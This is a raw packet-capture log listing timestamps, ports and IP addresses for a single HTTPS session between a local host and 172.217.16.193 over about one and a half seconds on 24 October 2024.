Oct 24, 2024 21:23:07.523574114 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.523637056 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.523652077 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.523772001 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.523901939 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.523916960 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.533010960 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.533051014 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.533097029 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.533113956 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.533128023 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.533159971 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.580446005 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.580645084 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.580662012 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.608604908 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.608653069 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.608680964 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.608696938 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.608755112 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.608767033 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.608932972 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.608994961 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.609009027 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.644212008 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.644251108 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.644284964 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.644313097 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.644325018 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.644341946 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.654552937 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.654594898 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.654618025 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.654625893 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.654670954 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.654678106 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.655271053 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.655352116 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.655364990 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.705415964 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.705466986 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.705504894 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.705521107 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.705585957 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.735090971 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.735286951 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.735344887 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.735352993 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.735383034 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.735415936 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.735433102 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.735440969 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.735483885 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.769710064 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.769798040 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.769841909 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.769908905 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.769926071 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.769982100 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.779148102 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.779225111 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.779268980 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.779289961 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.779305935 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.779382944 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.779732943 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.828749895 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.828808069 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.828813076 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.828828096 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.828885078 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.875911951 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.876002073 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.876039982 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.876070023 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.876075983 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.876122952 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.876157045 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.876269102 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.876302958 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.876321077 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.876336098 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.876398087 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.891366959 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.891452074 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.891518116 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.891532898 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.901591063 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.901663065 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.901676893 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.901725054 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.901779890 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.901792049 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.901918888 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.901954889 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.901978016 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.901993036 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.902189016 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.947691917 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.975764990 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.975799084 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.975857973 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.975878954 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.975939989 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.996398926 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.996536016 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.996584892 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.996613979 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.996620893 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.996635914 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:07.996678114 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:07.996694088 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.015424967 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.015476942 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.015508890 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.015527010 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.015604019 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.027503967 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.027601957 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.027646065 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.027662039 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.027678967 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.027726889 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.027736902 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.027750015 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.027810097 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.027821064 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.080760002 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.080802917 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.080862999 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.080885887 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.080949068 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.110070944 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.129987955 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.130065918 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.130130053 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.130146027 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.130215883 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.130228043 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.130280018 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.130342960 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.130356073 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.148315907 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.148397923 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.148411989 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.148427963 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.148494959 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.148508072 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.159492970 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.159559965 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.159599066 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.159610033 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.159624100 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.159656048 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.160213947 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.160262108 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.160273075 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.160285950 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.160340071 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.199464083 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.203622103 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.203664064 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.203694105 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.203711033 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.203768969 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.230324030 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.250246048 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.250292063 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.250319004 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.250335932 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.250386953 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.250399113 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.250451088 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.250500917 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.250510931 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.250525951 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.250582933 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.268049955 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.279275894 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.279340982 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.279352903 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.279375076 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.279484987 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.279499054 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.279748917 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.279788017 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.279809952 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.279822111 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.279881954 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.279894114 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.280520916 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.280579090 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.280591011 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.323537111 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.323673964 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.323689938 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.327826977 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.327903986 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.327918053 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.352514982 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.352612019 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.352627039 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.370151043 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.370189905 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.370243073 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.370258093 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.370326996 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.370434046 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.370594025 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.370655060 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.370667934 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.388968945 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.389030933 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.389045954 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.400329113 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.400388956 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.400403976 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.400465012 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.400506020 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.400535107 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.400564909 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.400625944 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.400638103 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.401379108 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.401710987 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.401746988 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.401762009 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.401807070 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.401818991 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.443573952 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.443633080 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.443660975 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.443686008 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.443753004 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.447622061 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.472472906 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.472564936 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.472585917 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.490255117 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.490320921 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.490350962 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.490365982 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.490422964 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.490436077 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.490567923 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.490621090 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.490633965 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.508832932 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.508898020 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.508912086 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.520562887 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.520626068 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.520638943 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.520653963 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.520706892 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.520718098 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.520813942 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.520863056 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.520868063 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.520883083 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.520929098 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.520940065 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.521806002 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.521859884 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.521867990 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.521898031 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.521950960 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.563575983 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.563783884 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.563848019 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.563863039 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.592037916 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.592119932 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.592133999 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.610172987 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.610261917 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.610275984 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.610419035 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.610481024 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.610492945 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.610605001 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.610658884 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.610671043 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.628410101 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.628478050 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.628482103 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.628499031 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.628559113 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.640445948 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.640594959 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.640625000 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.640651941 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.640666962 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.640721083 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.640855074 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.641238928 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.641295910 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.641308069 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.641362906 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.641408920 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.641422987 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.641434908 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.641483068 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.642205000 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.642527103 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.642585993 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.642599106 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.683475018 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.683556080 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.683576107 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.712675095 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.712860107 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.712878942 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.731626034 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.731712103 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.731725931 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.731822014 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.731882095 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.731894970 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.731985092 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.732052088 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.732064009 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.732147932 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.732204914 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.732217073 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.748975992 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.749057055 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.749070883 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.760982990 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.761070967 CEST	49169	443	192.168.2.22	172.217.16.193
Oct 24, 2024 21:23:08.761085033 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.761195898 CEST	443	49169	172.217.16.193	192.168.2.22
Oct 24, 2024 21:23:08.761260033 CEST	49169	443	192.168.2.22	172.217.16.193
